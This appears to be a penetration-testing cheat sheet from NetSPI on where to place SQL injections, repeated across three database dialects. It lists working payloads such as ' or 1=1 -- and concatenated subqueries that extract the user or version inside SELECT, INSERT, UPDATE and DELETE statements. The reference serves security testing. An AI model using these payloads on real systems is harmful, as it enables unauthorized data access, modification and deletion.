Injection Placement
SQL injection is always a hassle when it isn't apparent where the injection is taking place. It is helpful to have a few ways to exploit injections in various parts of the query.
$injection identifies the injection point. The injections that modify data attempt to always use concatenation and allow the rest of the query to be valid. See this post for more information.
| Injection placement | Query | Injection string |
|---|---|---|
| SELECT -> WHERE | SELECT * FROM USERS WHERE USER='$injection'; | ' or 1=1 -- |
| UPDATE -> SET | UPDATE USERS SET email='$injection' WHERE user='NetSPI'; | ' 'harold@netspi.com' ' |
| UPDATE -> WHERE Note: Try to set the injection string to a valid WHERE value. If the object is updated then the injection was successful. |
UPDATE USERS SET email='harold@netspi.com' WHERE user='$injection'; | ' 'netspi' ' |
| DELETE -> WHERE Note: Be very careful with delete queries, as the entire table can end up being deleted. |
DELETE FROM USERS WHERE USERS='$injection'; | ' 'harold@netspi.com' ' |
Injection Placement
SQL injection is always a hassle when it isn't apparent where the injection is taking place. It is helpful to have a few ways to exploit injections in various parts of the query.
$injection identifies the injection point. The injections that modify data attempt to always use concatenation and allow the rest of the query to be valid. See this post for more information.
| Injection placement | Query | Injection string |
|---|---|---|
| SELECT -> WHERE | SELECT user FROM dual WHERE user LIKE '$injection'; | '||'USER%'||' |
| INSERT -> VALUES | INSERT INTO log_table (message) VALUES ('$injection'); | '||(select user from dual)||' |
| UPDATE -> SET | UPDATE log_table SET message = '$injection' WHERE message = 'test'; | '||(select user from dual)|| |
| UPDATE -> WHERE Note: Try to set the injection string to a valid WHERE value. If the object is updated then the injection was successful. |
UPDATE log_table SET message = 'test' WHERE message = '$injection'; | '||'Injected'||' |
Injection Placement
SQL injection is always a hassle when it isn't apparent where the injection is taking place. It is helpful to have a few ways to exploit injections in various parts of the query.
$injection identifies the injection point. The injections that modify data attempt to always use concatenation and allow the rest of the query to be valid. See this post for more information.
| Injection placement | Query | Injection string |
|---|---|---|
| SELECT -> WHERE | SELECT * FROM USERS WHERE "USER"='$injection'; | ' or 1=1 -- |
| UPDATE -> SET | UPDATE USERS SET "email"='$injection' WHERE "USER"='NetSPI'; | '+'harold@netspi.com'+' |
| UPDATE -> WHERE Note: Try to set the injection string to a valid WHERE value. If the object is updated then the injection was successful. |
UPDATE USERS SET "email"='harold@netspi.com' WHERE "USER"='$injection'; | '+'NetSPI'+' |
| DELETE -> WHERE | DELETE USERS WHERE "User"='$injection'; | '+'NetSPI'+' |
| INSERT -> VALUES | INSERT INTO USERS ([User], [Password]) VALUES ('$injection', 'password'); | '+(select @@version)+' |
© 2023 Copyright by NetSPI. All rights reserved.